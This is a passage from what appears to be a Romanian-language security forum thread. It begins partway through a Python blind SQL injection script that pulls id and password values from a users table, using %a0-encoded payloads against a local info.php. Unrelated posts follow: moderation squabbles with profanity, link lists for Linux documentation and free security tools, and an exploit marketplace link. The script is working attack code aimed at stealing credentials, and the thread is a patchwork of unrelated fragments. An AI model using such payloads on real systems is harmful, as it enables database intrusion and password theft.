(j,field,index,i,i) attack_open = urllib.urlopen(attack_url) attack_result = attack_open.read() attack_open.close() if attack_result==true_result: ch = "%c" % j sys.stdout.write(ch) break print "\t\t", def get_length(false_url, false_result, field, index): i=0 while 1: data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i) data_length_open = urllib.urlopen(data_length_url) data_length_result = data_length_open.read() data_length_open.close() if data_length_result==false_result: return i i+=1 url = "http://127.0.0.1/info.php" true_url = url + "?num=1" true_open = urllib.urlopen(true_url) true_result = true_open.read() true_open.close() false_url = url + "?num=0" false_open = urllib.urlopen(false_url) false_result = false_open.read() false_open.close() print "num\t\tid\t\tpassword" fields = "num", "id", "password" for i in range(1, 4): for j in range(0, 3): length = get_length(false_url, false_result, fields[j], i) length = put_data(false_url, true_result, fields[j], i, length) print "" To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack. # Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt [EOF] Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials

Sfinte cacat, nu va bateti joc de aceasta categorie.

Ce pula mea "tutoriale" sunt astea? Nu mai postati toate rahaturile.

[h=1]30 Best Sources For Linux / *BSD / Unix Documentation On the Web[/h]by Vivek Gite on December 21, 2011 Man pages are written by sys-admin and developers for IT techs, and are intended more as a reference than as a how to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for particular commands or configuration file, but they are not helpful for new Linux users. Man pages are not good for learning something new for the first time. Here are thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html

Cati au primit avertisment sau ban pentru ca au postat acolo si nu aveau 10 posturi? Poate 2-3 care au venit cu intrebari si cereri idioate. Nu s-au dat decat probabil cateva avertismente pentru asa ceva, in functie de postul cu pricina. Nu tinem mult la acea regula, insa pana la urma e utila. De ce sa fie toti leecheri sa nu contribuie cu nimic? In primul rand se poate prezenta, de acolo ne facem o idee despre persoana in cauza si poate toleram chiar si o cerere stupida. Apoi, oricine poate posta o stire din IT sau ceva util.

[h=1]Probably the Best Free Security List in the World[/h]Updated 21. December 2011 - 4:27 by ako 1. Introduction / Keys / What's New 2. Realtime Protection 3. Scanners 4. Virus Removal Tools 5. Online Scanners 6. Firewalls 7. HIPS 8. System Hardening-HIPS 9. System Hardening 10. Sandboxing / Virtualization 11. Vulnerability Scanning 12. Browser Security 13. IP-Blocking/Hardening 14. Privacy 15. System Monitoring 16. Network Traffic Monitoring 17. System Cleaning 18. Data Rescue 19. Encrypting 20. Backup 21. System Rescue 22. Miscellaneous 23. Tests & Analysis Tools 24. Vista/Windows 7 Security 25. My Choices and More Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm

ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/